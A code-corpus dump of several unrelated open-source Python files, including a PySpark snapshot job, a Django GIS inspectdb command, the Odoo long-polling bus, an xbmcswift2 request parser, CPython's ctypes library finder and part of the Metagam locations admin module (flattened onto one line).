F_CI_SUN_IND_INFO_TMP.registerTempTable("F_CI_SUN_IND_INFO_TMP")
dfn="F_CI_SUN_IND_INFO_TMP/"+V_DT+".parquet"
# Cache before count() so the subsequent save() reuses the computed result.
F_CI_SUN_IND_INFO_TMP.cache()
nrows = F_CI_SUN_IND_INFO_TMP.count()
F_CI_SUN_IND_INFO_TMP.write.save(path=hdfs + '/' + dfn, mode='overwrite')
F_CI_SUN_IND_INFO_TMP.unpersist()
# Remove the previous day's output to keep only the latest snapshot.
ret = os.system("hdfs dfs -rm -r /"+dbname+"/F_CI_SUN_IND_INFO_TMP/"+V_DT_LD+".parquet")
et = datetime.now()
# Python 2 print statement: the expression is ("...") % (args), i.e. the
# formatted string is what gets printed.
print("Step %d start[%s] end[%s] use %d seconds, insert F_CI_SUN_IND_INFO_TMP lines %d") % (V_STEP, st.strftime("%H:%M:%S"), et.strftime("%H:%M:%S"), (et-st).seconds, nrows)
gpl-3.0
zzzombat/lucid-python-django
django/contrib/gis/management/commands/inspectdb.py
311
1553
from optparse import make_option

from django.core.management.base import CommandError
from django.core.management.commands.inspectdb import Command as InspectDBCommand


class Command(InspectDBCommand):
    """GIS-aware variant of `inspectdb` that recognizes geometry columns."""

    db_module = 'django.contrib.gis.db'
    gis_tables = {}

    def get_field_type(self, connection, table_name, row):
        """Resolve the model field type for a column, specializing geometry.

        Delegates to the stock inspectdb implementation first; when that
        reports a generic ``GeometryField``, asks the spatial backend for the
        precise geometry type and extra field parameters, and records the
        table/column in ``gis_tables``.
        """
        field_type, field_params, field_notes = super(Command, self).get_field_type(connection, table_name, row)
        if field_type == 'GeometryField':
            column = row[0]
            # Ask the spatial backend for the concrete geometry type and any
            # additional field parameters for this column.
            field_type, geo_params = connection.introspection.get_geometry_type(table_name, column)
            field_params.update(geo_params)
            # Remember that this table has geometry columns so get_meta()
            # can attach a GeoManager to the generated model.
            self.gis_tables.setdefault(table_name, []).append(column)
        return field_type, field_params, field_notes

    def get_meta(self, table_name):
        """Return the model Meta lines, prepending a GeoManager when needed."""
        meta_lines = super(Command, self).get_meta(table_name)
        if table_name in self.gis_tables:
            # Geographic models need GeoManager as their default manager.
            meta_lines.insert(0, '    objects = models.GeoManager()')
        return meta_lines
bsd-3-clause
shingonoide/odoo
addons/bus/bus.py
325
7324
# -*- coding: utf-8 -*-
"""Inter-process message bus built on PostgreSQL LISTEN/NOTIFY.

Messages are persisted in the ``bus.bus`` table and a ``NOTIFY imbus``
is emitted on a dedicated postgres connection; a single dispatcher
thread (or greenlet) wakes up the long-polling HTTP handlers waiting on
the notified channels.
"""
import datetime
import json
import logging
import select
import threading
import time
import random

import simplejson

import openerp
from openerp.osv import osv, fields
from openerp.http import request
from openerp.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT

_logger = logging.getLogger(__name__)

# Long-poll timeout (seconds); also drives garbage collection of old messages.
TIMEOUT = 50

#----------------------------------------------------------
# Bus
#----------------------------------------------------------
def json_dump(v):
    """Serialize *v* compactly (no spaces) so channel keys compare equal."""
    return simplejson.dumps(v, separators=(',', ':'))

def hashable(key):
    """Make *key* usable as a dict key (lists become tuples)."""
    if isinstance(key, list):
        key = tuple(key)
    return key

class ImBus(osv.Model):
    """Persistent storage for bus notifications."""

    _name = 'bus.bus'
    _columns = {
        'id': fields.integer('Id'),
        'create_date': fields.datetime('Create date'),
        'channel': fields.char('Channel'),
        'message': fields.char('Message'),
    }

    def gc(self, cr, uid):
        """Delete messages older than twice the poll timeout."""
        timeout_ago = datetime.datetime.utcnow() - datetime.timedelta(seconds=TIMEOUT * 2)
        domain = [('create_date', '<', timeout_ago.strftime(DEFAULT_SERVER_DATETIME_FORMAT))]
        ids = self.search(cr, openerp.SUPERUSER_ID, domain)
        self.unlink(cr, openerp.SUPERUSER_ID, ids)

    def sendmany(self, cr, uid, notifications):
        """Store (channel, message) pairs and notify listening dispatchers.

        The commit is deliberate: the NOTIFY goes out on a separate postgres
        connection, so rows must be visible to other transactions before the
        listeners wake up and re-poll.
        """
        channels = set()
        for channel, message in notifications:
            channels.add(channel)
            values = {
                "channel": json_dump(channel),
                "message": json_dump(message)
            }
            self.pool['bus.bus'].create(cr, openerp.SUPERUSER_ID, values)
            cr.commit()
        # Probabilistic garbage collection: roughly 1 send in 100 pays the
        # cleanup cost instead of running a dedicated cron job.
        if random.random() < 0.01:
            self.gc(cr, uid)
        if channels:
            with openerp.sql_db.db_connect('postgres').cursor() as cr2:
                cr2.execute("notify imbus, %s", (json_dump(list(channels)),))

    def sendone(self, cr, uid, channel, message):
        """Convenience wrapper around :meth:`sendmany` for one message."""
        self.sendmany(cr, uid, [[channel, message]])

    def poll(self, cr, uid, channels, last=0):
        """Return notifications on *channels* newer than id *last*.

        A first poll (last == 0) replays the recent buffer (messages younger
        than TIMEOUT); subsequent polls only return unread notifications.
        """
        if last == 0:
            timeout_ago = datetime.datetime.utcnow() - datetime.timedelta(seconds=TIMEOUT)
            domain = [('create_date', '>', timeout_ago.strftime(DEFAULT_SERVER_DATETIME_FORMAT))]
        else:
            domain = [('id', '>', last)]
        channels = [json_dump(c) for c in channels]
        domain.append(('channel', 'in', channels))
        notifications = self.search_read(cr, openerp.SUPERUSER_ID, domain)
        return [{"id": notif["id"],
                 "channel": simplejson.loads(notif["channel"]),
                 "message": simplejson.loads(notif["message"])}
                for notif in notifications]

class ImDispatch(object):
    """Dispatches postgres bus notifications to waiting pollers."""

    def __init__(self):
        # channel key -> list of Events of pollers waiting on that channel
        self.channels = {}

    def poll(self, dbname, channels, last, timeout=TIMEOUT):
        """Block up to *timeout* seconds waiting for bus notifications."""
        # Dont hang ctrl-c for a poll request, we need to bypass private
        # attribute access because we dont know before starting the thread that
        # it will handle a longpolling request
        if not openerp.evented:
            current = threading.current_thread()
            current._Thread__daemonic = True
            # rename the thread to avoid tests waiting for a longpolling
            current.setName("openerp.longpolling.request.%s" % current.ident)
        registry = openerp.registry(dbname)

        # immediatly returns if past notifications exist
        with registry.cursor() as cr:
            notifications = registry['bus.bus'].poll(cr, openerp.SUPERUSER_ID, channels, last)
        # or wait for future ones
        if not notifications:
            event = self.Event()
            for c in channels:
                self.channels.setdefault(hashable(c), []).append(event)
            try:
                event.wait(timeout=timeout)
                with registry.cursor() as cr:
                    notifications = registry['bus.bus'].poll(cr, openerp.SUPERUSER_ID, channels, last)
            except Exception:
                # timeout
                pass
        return notifications

    def loop(self):
        """ Dispatch postgres notifications to the relevant polling threads/greenlets """
        _logger.info("Bus.loop listen imbus on db postgres")
        with openerp.sql_db.db_connect('postgres').cursor() as cr:
            conn = cr._cnx
            cr.execute("listen imbus")
            cr.commit()
            while True:
                if select.select([conn], [], [], TIMEOUT) == ([], [], []):
                    # select timed out: loop again and keep listening
                    pass
                else:
                    conn.poll()
                    channels = []
                    while conn.notifies:
                        channels.extend(json.loads(conn.notifies.pop().payload))
                    # dispatch to local threads/greenlets
                    events = set()
                    for c in channels:
                        events.update(self.channels.pop(hashable(c), []))
                    for e in events:
                        e.set()

    def run(self):
        """Run :meth:`loop` forever, sleeping and retrying on failure."""
        while True:
            try:
                self.loop()
            except Exception:
                _logger.exception("Bus.loop error, sleep and retry")
                time.sleep(TIMEOUT)

    def start(self):
        """Start the dispatcher in the mode matching the server (gevent,
        threaded) and return self; disabled entirely in prefork mode."""
        if openerp.evented:
            # gevent mode
            import gevent
            self.Event = gevent.event.Event
            gevent.spawn(self.run)
        elif openerp.multi_process:
            # disabled in prefork mode
            return
        else:
            # threaded mode
            self.Event = threading.Event
            t = threading.Thread(name="%s.Bus" % __name__, target=self.run)
            t.daemon = True
            t.start()
        return self

dispatch = ImDispatch().start()

#----------------------------------------------------------
# Controller
#----------------------------------------------------------
class Controller(openerp.http.Controller):
    """ Examples:
    openerp.jsonRpc('/longpolling/poll','call',{"channels":["c1"],last:0}).then(function(r){console.log(r)});
    openerp.jsonRpc('/longpolling/send','call',{"channel":"c1","message":"m1"});
    openerp.jsonRpc('/longpolling/send','call',{"channel":"c2","message":"m2"});
    """

    @openerp.http.route('/longpolling/send', type="json", auth="public")
    def send(self, channel, message):
        if not isinstance(channel, basestring):
            raise Exception("bus.Bus only string channels are allowed.")
        registry, cr, uid, context = request.registry, request.cr, request.session.uid, request.context
        return registry['bus.bus'].sendone(cr, uid, channel, message)

    # override to add channels
    def _poll(self, dbname, channels, last, options):
        # Release the request cursor: the dispatcher blocks for up to TIMEOUT
        # seconds and must not hold a database connection while waiting.
        request.cr.close()
        request._cr = None
        return dispatch.poll(dbname, channels, last)

    @openerp.http.route('/longpolling/poll', type="json", auth="public")
    def poll(self, channels, last, options=None):
        if options is None:
            options = {}
        if not dispatch:
            raise Exception("bus.Bus unavailable")
        if [c for c in channels if not isinstance(c, basestring)]:
            # Fixed: removed a leftover debug `print channels` statement that
            # wrote every malformed request's channel list to stdout.
            raise Exception("bus.Bus only string channels are allowed.")
        return self._poll(request.db, channels, last, options)

# vim:et:
agpl-3.0
Mafarricos/Mafarricos-modded-xbmc-addons
plugin.video.streamajoker/resources/site-packages/xbmcswift2/request.py
34
1433
'''
    xbmcswift2.request
    ------------------

    This module contains the Request class. This class represents an incoming
    request from XBMC.

    :copyright: (c) 2012 by Jonathan Beluch
    :license: GPLv3, see LICENSE for more details.
'''
from xbmcswift2.common import unpickle_args
import urlparse
try:
    from urlparse import parse_qs
except ImportError:
    from cgi import parse_qs


class Request(object):
    '''Holds the arguments XBMC passed to the plugin on the command line.

    :param url: The complete plugin URL being requested. Since XBMC typically
                passes the URL query string in a separate argument from the
                base URL, they must be joined into a single string before
                being provided.
    :param handle: The handle associated with the current request.
    '''

    def __init__(self, url, handle):
        #: The entire request url.
        self.url = url

        #: The current request's handle, an integer.
        self.handle = int(handle)

        # urlparse doesn't like the 'plugin' scheme, so split it off and
        # parse a protocol-relative url, e.g. //plugin.video.helloxbmc/path
        scheme, remainder = url.split(':', 1)
        self.scheme = scheme
        parsed = urlparse.urlparse(remainder)
        self.netloc = parsed[1]
        self.path = parsed[2]
        self.query_string = parsed[4]

        #: Query arguments, decoded from their pickled wire format.
        self.args = unpickle_args(parse_qs(self.query_string))
gpl-2.0
tinkerinestudio/Tinkerine-Suite
TinkerineSuite/pypy/lib-python/2.7/ctypes/util.py
2
9030
######################################################################
#  This file should be kept compatible with Python 2.3, see PEP 291. #
######################################################################
# Locate shared libraries by name for ctypes.  Exactly one find_library()
# implementation is defined below, selected by os.name / sys.platform at
# import time.
import sys, os

# find_library(name) returns the pathname of a library, or None.
if os.name == "nt":

    def _get_build_version():
        """Return the version of MSVC that was used to build Python.

        For Python 2.3 and up, the version number is included in
        sys.version.  For earlier versions, assume the compiler is MSVC 6.
        """
        # This function was copied from Lib/distutils/msvccompiler.py
        prefix = "MSC v."
        i = sys.version.find(prefix)
        if i == -1:
            return 6
        i = i + len(prefix)
        s, rest = sys.version[i:].split(" ", 1)
        majorVersion = int(s[:-2]) - 6
        minorVersion = int(s[2:3]) / 10.0
        # I don't think paths are affected by minor version in version 6
        if majorVersion == 6:
            minorVersion = 0
        if majorVersion >= 6:
            return majorVersion + minorVersion
        # else we don't know what version of the compiler this is
        return None

    def find_msvcrt():
        """Return the name of the VC runtime dll"""
        version = _get_build_version()
        if version is None:
            # better be safe than sorry
            return None
        if version <= 6:
            clibname = 'msvcrt'
        else:
            clibname = 'msvcr%d' % (version * 10)

        # If python was built with in debug mode
        import imp
        if imp.get_suffixes()[0][0] == '_d.pyd':
            clibname += 'd'
        return clibname+'.dll'

    def find_library(name):
        # 'c' and 'm' map to the VC runtime on Windows.
        if name in ('c', 'm'):
            return find_msvcrt()
        # See MSDN for the REAL search order.
        for directory in os.environ['PATH'].split(os.pathsep):
            fname = os.path.join(directory, name)
            if os.path.isfile(fname):
                return fname
            if fname.lower().endswith(".dll"):
                continue
            fname = fname + ".dll"
            if os.path.isfile(fname):
                return fname
        return None

if os.name == "ce":
    # search path according to MSDN:
    # - absolute path specified by filename
    # - The .exe launch directory
    # - the Windows directory
    # - ROM dll files (where are they?)
    # - OEM specified search path: HKLM\Loader\SystemPath
    def find_library(name):
        # Windows CE: the loader performs the search itself.
        return name

if os.name == "posix" and sys.platform == "darwin":
    def find_library(name):
        # Try the usual Mac OS X naming conventions via dyld.
        from ctypes.macholib.dyld import dyld_find as _dyld_find
        possible = ['lib%s.dylib' % name,
                    '%s.dylib' % name,
                    '%s.framework/%s' % (name, name)]
        for name in possible:
            try:
                return _dyld_find(name)
            except ValueError:
                continue
        return None

elif os.name == "posix":
    # Andreas Degert's find functions, using gcc, /sbin/ldconfig, objdump
    import re, tempfile, errno

    def _findLib_gcc(name):
        # Ask gcc/cc (via the linker trace option -Wl,-t) which file it
        # would link for -l<name>; returns the matched path or None.
        expr = r'[^\(\)\s]*lib%s\.[^\(\)\s]*' % re.escape(name)
        fdout, ccout = tempfile.mkstemp()
        os.close(fdout)
        cmd = 'if type gcc >/dev/null 2>&1; then CC=gcc; elif type cc >/dev/null 2>&1; then CC=cc;else exit 10; fi;' \
              '$CC -Wl,-t -o ' + ccout + ' 2>&1 -l' + name
        try:
            f = os.popen(cmd)
            try:
                trace = f.read()
            finally:
                rv = f.close()
        finally:
            try:
                os.unlink(ccout)
            except OSError, e:
                if e.errno != errno.ENOENT:
                    raise
        if rv == 10:
            raise OSError, 'gcc or cc command not found'
        res = re.search(expr, trace)
        if not res:
            return None
        return res.group(0)

    if sys.platform == "sunos5":
        # use /usr/ccs/bin/dump on solaris
        def _get_soname(f):
            # Extract the SONAME field from the dynamic section of *f*.
            if not f:
                return None
            cmd = "/usr/ccs/bin/dump -Lpv 2>/dev/null " + f
            f = os.popen(cmd)
            try:
                data = f.read()
            finally:
                f.close()
            res = re.search(r'\[.*\]\sSONAME\s+([^\s]+)', data)
            if not res:
                return None
            return res.group(1)
    else:
        def _get_soname(f):
            # assuming GNU binutils / ELF
            if not f:
                return None
            cmd = 'if ! type objdump >/dev/null 2>&1; then exit 10; fi;' \
                  "objdump -p -j .dynamic 2>/dev/null " + f
            # NOTE(review): the command is executed twice below — once to
            # detect a missing objdump (exit status 10), once to read the
            # actual output; presumably historical, confirm before changing.
            f = os.popen(cmd)
            dump = f.read()
            rv = f.close()
            if rv == 10:
                raise OSError, 'objdump command not found'
            f = os.popen(cmd)
            try:
                data = f.read()
            finally:
                f.close()
            res = re.search(r'\sSONAME\s+([^\s]+)', data)
            if not res:
                return None
            return res.group(1)

    if (sys.platform.startswith("freebsd")
        or sys.platform.startswith("openbsd")
        or sys.platform.startswith("dragonfly")):

        def _num_version(libname):
            # "libxyz.so.MAJOR.MINOR" => [ MAJOR, MINOR ]
            parts = libname.split(".")
            nums = []
            try:
                while parts:
                    nums.insert(0, int(parts.pop()))
            except ValueError:
                pass
            # No numeric suffix at all sorts last (highest version wins).
            return nums or [ sys.maxint ]

        def find_library(name):
            # Parse the ldconfig hints and pick the highest-versioned match;
            # fall back to asking the compiler/linker.
            ename = re.escape(name)
            expr = r':-l%s\.\S+ => \S*/(lib%s\.\S+)' % (ename, ename)
            f = os.popen('/sbin/ldconfig -r 2>/dev/null')
            try:
                data = f.read()
            finally:
                f.close()
            res = re.findall(expr, data)
            if not res:
                return _get_soname(_findLib_gcc(name))
            res.sort(cmp= lambda x,y: cmp(_num_version(x), _num_version(y)))
            return res[-1]

    else:

        def _findLib_ldconfig(name):
            # XXX assuming GLIBC's ldconfig (with option -p)
            expr = r'/[^\(\)\s]*lib%s\.[^\(\)\s]*' % re.escape(name)
            f = os.popen('LC_ALL=C LANG=C /sbin/ldconfig -p 2>/dev/null')
            try:
                data = f.read()
            finally:
                f.close()
            res = re.search(expr, data)
            if not res:
                # Hm, this works only for libs needed by the python executable.
                cmd = 'ldd %s 2>/dev/null' % sys.executable
                f = os.popen(cmd)
                try:
                    data = f.read()
                finally:
                    f.close()
                res = re.search(expr, data)
                if not res:
                    return None
            return res.group(0)

        def _findSoname_ldconfig(name):
            # Determine the glibc ABI tag for this machine so the right
            # ldconfig cache entries are matched (e.g. 'libc6,x86-64').
            import struct
            if struct.calcsize('l') == 4:
                machine = os.uname()[4] + '-32'
            else:
                machine = os.uname()[4] + '-64'
            mach_map = {
                'x86_64-64': 'libc6,x86-64',
                'ppc64-64': 'libc6,64bit',
                'sparc64-64': 'libc6,64bit',
                's390x-64': 'libc6,64bit',
                'ia64-64': 'libc6,IA-64',
                }
            abi_type = mach_map.get(machine, 'libc6')
            # XXX assuming GLIBC's ldconfig (with option -p)
            expr = r'(\S+)\s+\((%s(?:, OS ABI:[^\)]*)?)\)[^/]*(/[^\(\)\s]*lib%s\.[^\(\)\s]*)' \
                   % (abi_type, re.escape(name))
            f = os.popen('/sbin/ldconfig -p 2>/dev/null')
            try:
                data = f.read()
            finally:
                f.close()
            res = re.search(expr, data)
            if not res:
                return None
            return res.group(1)

        def find_library(name):
            # Prefer the ldconfig cache; fall back to the compiler/linker.
            return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))

################################################################
# test code

def test():
    # Manual smoke test; exercised only when running this module directly.
    from ctypes import cdll
    if os.name == "nt":
        print cdll.msvcrt
        print cdll.load("msvcrt")
        print find_library("msvcrt")

    if os.name == "posix":
        # find and load_version
        print find_library("m")
        print find_library("c")
        print find_library("bz2")

        # getattr
##        print cdll.m
##        print cdll.bz2

        # load
        if sys.platform == "darwin":
            print cdll.LoadLibrary("libm.dylib")
            print cdll.LoadLibrary("libcrypto.dylib")
            print cdll.LoadLibrary("libSystem.dylib")
            print cdll.LoadLibrary("System.framework/System")
        else:
            print cdll.LoadLibrary("libm.so")
            print cdll.LoadLibrary("libcrypt.so")
            print find_library("crypt")

if __name__ == "__main__":
    test()
agpl-3.0
JoyTeam/metagam
mg/mmorpg/locations.py
1
66627
#!/usr/bin/python2.6 # This file is a part of Metagam project. # # Metagam is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # any later version. # # Metagam is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Metagam. If not, see <http://www.gnu.org/licenses/>. from mg import * from mg.constructor import * from mg.mmorpg.locations_classes import * import cStringIO from PIL import Image, ImageDraw, ImageEnhance, ImageFont, ImageOps, ImageFilter import re import hashlib from uuid import uuid4 re_polygon_param = re.compile(r'^polygon-(\d+)$') re_multiimage_map = re.compile(r'^([a-f0-9]+)/([a-f0-9]+)$') re_multiimage_map_del = re.compile(r'^([a-f0-9]+)/del/([a-f0-9]+)$') class LocationsAdmin(ConstructorModule): def register(self): self.rhook("permissions.list", self.permissions_list) self.rhook("menu-admin-root.index", self.menu_root_index) self.rhook("menu-admin-locations.index", self.menu_locations_index) self.rhook("ext-admin-locations.editor", self.admin_locations_editor, priv="locations.editor") self.rhook("headmenu-admin-locations.editor", self.headmenu_locations_editor) self.rhook("ext-admin-locations.config", self.admin_locations_config, priv="locations.config") self.rhook("headmenu-admin-locations.config", self.headmenu_locations_config) self.rhook("objclasses.list", self.objclasses_list) self.rhook("admin-interface.progress-bars", self.progress_bars) self.rhook("admin-locations.valid-transitions", self.valid_transitions) self.rhook("admin-locations.update-transitions", self.update_transitions) self.rhook("advice-admin-locations.index", self.advice_locations) 
self.rhook("auth.user-tables", self.user_tables) self.rhook("ext-admin-locations.teleport", self.admin_locations_teleport, priv="locations.teleport") self.rhook("headmenu-admin-locations.teleport", self.headmenu_locations_teleport) self.rhook("admin-locations.links", self.links) self.rhook("admin-locations.render-links", self.render_links) self.rhook("admin-locations.all", self.locations_all) self.rhook("admin-gameinterface.design-files", self.design_files) def design_files(self, files): files.append({"filename": "location-layout.html", "description": self._("Location page layout"), "doc": "/doc/locations"}) files.append({"filename": "location-arrows.html", "description": self._("Left/right/up/down arrows for the location"), "doc": "/doc/locations"}) files.append({"filename": "location-static.html", "description": self._("Static image location interface"), "doc": "/doc/locations"}) files.append({"filename": "location-multistatic.html", "description": self._("Multiple static images location interface"), "doc": "/doc/locations"}) files.append({"filename": "location-transitions.html", "description": self._("List of transitions in the location"), "doc": "/doc/locations"}) files.append({"filename": "location-canvas.html", "description": self._("HTML5 Canvas location interface"), "doc": "/doc/locations"}) def links(self, location, links): req = self.req() if req.has_access("locations.editor"): links.append({"hook": "locations/editor/%s" % location.uuid, "text": self._("Location"), "order": -10}) def render_links(self, location, links): self.call("admin-locations.links", location, links) if links: req = self.req() uri = req.group if req.hook != "index": uri = "%s/%s" % (uri, req.hook) if req.args: uri = "%s/%s" % (uri, req.args) for l in links: if not l.get("always_href") and ("admin-%s" % l.get("hook") == uri): del l["hook"] links.sort(cmp=lambda x, y: cmp(x.get("order", 0), y.get("order", 0)) or cmp(x.get("text"), y.get("text"))) links[-1]["lst"] = True def 
headmenu_locations_teleport(self, args): return [self._("Service teleport"), "auth/user-dashboard/%s?active_tab=location" % htmlescape(args)] def admin_locations_teleport(self): req = self.req() character = self.character(req.args) if not character.valid: self.call("web.not_found") # list of locations lst = self.objlist(DBLocationList, query_index="all") lst.load() locations = [(loc.uuid, loc.get("name")) for loc in lst] valid_locations = set([loc.uuid for loc in lst]) # processing request if req.ok(): errors = {} # loc loc = req.param("v_loc") if not loc: errors["v_loc"] = self._("This field is mandatory") elif not loc in valid_locations: errors["v_loc"] = self._("Select a valid location") # errors if errors: self.call("web.response_json_html", {"success": False, "errors": errors}) # teleporting self.call("teleport.character", character, self.location(loc)) character.main_open("/location") self.call("admin.redirect", "auth/user-dashboard/%s?active_tab=location" % character.uuid) # rendering form fields = [ {"name": "loc", "label": self._("Target location"), "type": "combo", "values": locations, "value": character.location.uuid if character.location else None}, ] self.call("admin.form", fields=fields) def advice_locations(self, hook, args, advice): advice.append({"title": self._("Locations documentation"), "content": self._('You can find detailed information on the location system in the <a href="//www.%s/doc/locations" target="_blank">locations page</a> in the reference manual.') % self.main_host}) def objclasses_list(self, objclasses): objclasses["CharacterLocation"] = (DBCharacterLocation, DBCharacterLocationList) objclasses["Location"] = (DBLocation, DBLocationList) objclasses["LocParams"] = (DBLocParams, DBLocParamsList) def child_modules(self): lst = [ "mg.mmorpg.locations.LocationsStaticImages", "mg.mmorpg.locations.LocationsStaticImagesAdmin", "mg.mmorpg.locations.LocationsMultiStaticImages", "mg.mmorpg.locations.LocationsMultiStaticImagesAdmin", 
"mg.mmorpg.locparams.LocationParams", "mg.mmorpg.locfunctions.LocationFunctions"] return lst def menu_root_index(self, menu): menu.append({"id": "locations.index", "text": self._("Locations"), "order": 20}) def menu_locations_index(self, menu): req = self.req() if req.has_access("locations.config"): menu.append({"id": "locations/config", "text": self._("Locations configuration"), "order": 0, "leaf": True}) menu.append({"id": "locations/editor", "text": self._("Locations editor"), "order": 1, "leaf": True}) def permissions_list(self, perms): perms.append({"id": "locations.editor", "name": self._("Locations editor")}) perms.append({"id": "locations.config", "name": self._("Locations configuration")}) perms.append({"id": "locations.users", "name": self._("Viewing characters locations")}) perms.append({"id": "locations.teleport", "name": self._("Service teleport")}) def user_tables(self, user, tables): req = self.req() if req.has_access("locations.users"): character = self.character(user.uuid) if character.valid: if character.location: location = htmlescape(character.location.name) if req.has_access("locations.editor"): location = u'<hook:admin.link href="locations/editor/%s" title="%s" />' % (character.location.uuid, location) else: location = self._("none") loc_row = [self._("Location"), location] if req.has_access("locations.teleport"): loc_row.append(u'<hook:admin.link href="locations/teleport/%s" title="%s" />' % (character.uuid, self._("teleport the character"))) table = { "type": "location", "title": self._("Location"), "order": 30, "rows": [ loc_row, ] } tables.append(table) def headmenu_locations_editor(self, args): if args == "new": return [self._("New location"), "locations/editor"] elif args: location = self.location(args) if location.valid(): return [location.name, "locations/editor"] else: return [self._("Editor"), "locations/editor"] return self._("Locations") def admin_locations_editor(self): req = self.req() if req.args: if req.args != "new": location 
= self.location(req.args) if not location.valid(): self.call("web.response_json", {"success": True, "redirect": "locations/editor"}) db_loc = location.db_location else: db_loc = self.obj(DBLocation) lang = self.call("l10n.lang") if req.ok(): self.call("web.upload_handler") errors = {} name = req.param("name") if not name: errors["name"] = self._("Name is mandatory") elif name != htmlescape(name) or name != jsencode(name): errors["name"] = self._("Name contains forbidden symbols") else: db_loc.set("name", name) if lang == "ru": if req.param("name_g"): db_loc.set("name_g", req.param("name_g")) else: db_loc.delkey("name_g") if req.param("name_a"): db_loc.set("name_a", req.param("name_a")) else: db_loc.delkey("name_a") if req.param("name_w"): db_loc.set("name_w", req.param("name_w")) else: db_loc.delkey("name_w") if req.param("name_t"): db_loc.set("name_t", req.param("name_t")) else: db_loc.delkey("name_t") if req.param("name_f"): db_loc.set("name_f", req.param("name_f")) else: db_loc.delkey("name_f") val = req.param("delay") if not valid_nonnegative_int(val): errors["delay"] = self._("Delay must be a non-negative integer value") else: db_loc.set("delay", intz(val)) for dest in ["up", "left", "right", "down", "exit"]: loc = req.param("v_loc_%s" % dest) if loc: loc = self.location(loc) if not loc.valid(): errors["v_loc_%s" % dest] = self._("Invalid location selected") elif loc.uuid == db_loc.uuid: errors["v_loc_%s" % dest] = self._("Link to the same location") else: db_loc.set("loc_%s" % dest, loc.uuid) else: db_loc.delkey("loc_%s" % dest) image_type = req.param("v_image_type") db_loc.set("image_type", image_type) flags = {} if image_type == "none": flags["image_type_valid"] = True self.call("admin-locations.editor-form-validate", db_loc, flags, errors) if not flags.get("image_type_valid"): errors["v_image_type"] = self._("Select valid visualization type") # errors if len(errors): self.call("web.response_json_html", {"success": False, "errors": errors}) # storing 
self.call("admin-locations.editor-form-store", db_loc, flags) self.call("admin-locations.update-transitions", db_loc) transitions = db_loc.get("transitions", {}) char = self.character(req.user()) for loc_id, info in transitions.iteritems(): info["show-trans"] = True if req.param("tr-%s-show-trans" % loc_id) else False info["hint"] = req.param("tr-%s-hint" % loc_id).strip() val = req.param("tr-%s-delay" % loc_id).strip() info["delay"] = intz(val) if val != "" else None info["available"] = self.call("script.admin-expression", "tr-%s-available" % loc_id, errors, globs={"char": char}) if req.param("tr-%s-available" % loc_id) != "" else 1 info["error"] = self.call("script.admin-text", "tr-%s-error" % loc_id, errors, globs={"char": char}) db_loc.store() self.call("admin-locations.editor-form-cleanup", db_loc, flags) self.call("web.response_json_html", {"success": True, "redirect": "locations/editor/%s" % db_loc.uuid, "parameters": {"saved": 1}}) # rendering form fields = [] fields.append({"name": "name", "value": db_loc.get("name"), "label": self._("Location name")}) if lang == "ru": fields.append({"name": "name_g", "value": db_loc.get("name_g"), "label": self._("Location name in genitive")}) fields.append({"name": "name_a", "value": db_loc.get("name_a"), "label": self._("Location name in accusative"), "inline": True}) fields.append({"name": "name_w", "value": db_loc.get("name_w"), "label": self._("Location name (where?) - 'in the Some Location'")}) fields.append({"name": "name_t", "value": db_loc.get("name_t"), "label": self._("Location name (to where?) - 'to the Some Location'"), "inline": True}) fields.append({"name": "name_f", "value": db_loc.get("name_f"), "label": self._("Location name (from where?) 
- 'from the Some Location'"), "inline": True}) # timing fields.append({"name": "delay", "label": self._("Delay when moving to this location and from it"), "value": db_loc.get("delay", default_location_delay)}) # left/right/up/down navigation lst = self.objlist(DBLocationList, query_index="all") lst.load() locations = [(loc.uuid, loc.get("name")) for loc in lst if loc.uuid != db_loc.uuid] locations.insert(0, ("", "---------------")) fields.append({"name": "loc_up", "label": self._("Location to the up"), "type": "combo", "values": locations, "value": db_loc.get("loc_up", "")}) fields.append({"name": "loc_left", "label": self._("Location to the left"), "type": "combo", "values": locations, "value": db_loc.get("loc_left", "")}) fields.append({"name": "loc_right", "label": self._("Location to the right"), "type": "combo", "values": locations, "value": db_loc.get("loc_right", ""), "inline": True}) fields.append({"name": "loc_down", "label": self._("Location to the down"), "type": "combo", "values": locations, "value": db_loc.get("loc_down", "")}) fields.append({"name": "loc_exit", "label": self._("This location has 'Exit' direction pointing to this location"), "type": "combo", "values": locations, "value": db_loc.get("loc_exit", "")}) # image type image_types = [] image_types.append(("none", self._("No image"))) image_type = {"name": "image_type", "type": "combo", "value": db_loc.get("image_type", "none"), "label": self._("Visualization type"), "values": image_types} fields.append(image_type) self.call("admin-locations.editor-form-render", db_loc, fields) if not db_loc.get("image_type") and image_type["values"] and not image_type["value"]: image_type["value"] = image_type["values"][0][0] menu = None # rendering location preview if req.args != "new": menu = [] self.call("admin-locations.render-links", location, menu) # location preview self.call("admin-locations.render", location, fields) # transitions for loc_id, info in db_loc.get("transitions", {}).iteritems(): loc = 
self.location(loc_id) if not loc.valid(): continue fields.append({"type": "header", "html": '%s: %s' % (self._("Transition"), loc.name_t)}) fields.append({"name": "tr-%s-show-trans" % loc_id, "type": "checkbox", "label": self._("Show this location in the text list of transitions"), "checked": info.get("show-trans", True)}) fields.append({"name": "tr-%s-hint" % loc_id, "label": self._("Hint when mouse over the link"), "value": info.get("hint")}) fields.append({"name": "tr-%s-available" % loc_id, "label": self._("Transition is available for the character") + self.call("script.help-icon-expressions"), "value": self.call("script.unparse-expression", info.get("available", 1))}) fields.append({"name": "tr-%s-error" % loc_id, "label": self._("Error message when transition is unavailable") + self.call("script.help-icon-expressions"), "value": self.call("script.unparse-text", info.get("error", "")), "inline": True}) fields.append({"name": "tr-%s-delay" % loc_id, "label": self._("Delay when moving to this location (if not specified delay will be calculated as sum of delays on both locations)"), "value": info.get("delay")}) self.call("admin.form", fields=fields, modules=["FileUploadField"], menu=menu) rows = [] locations = [] lst = self.objlist(DBLocationList, query_index="all") lst.load() for db_loc in lst: row = [ u'<strong>%s</strong><br />%s' % (htmlescape(db_loc.get("name")), db_loc.uuid), None, '<hook:admin.link href="locations/editor/%s" title="%s" />' % (db_loc.uuid, self._("edit")), ] rows.append(row) locations.append({ "db_loc": db_loc, "row": row }) 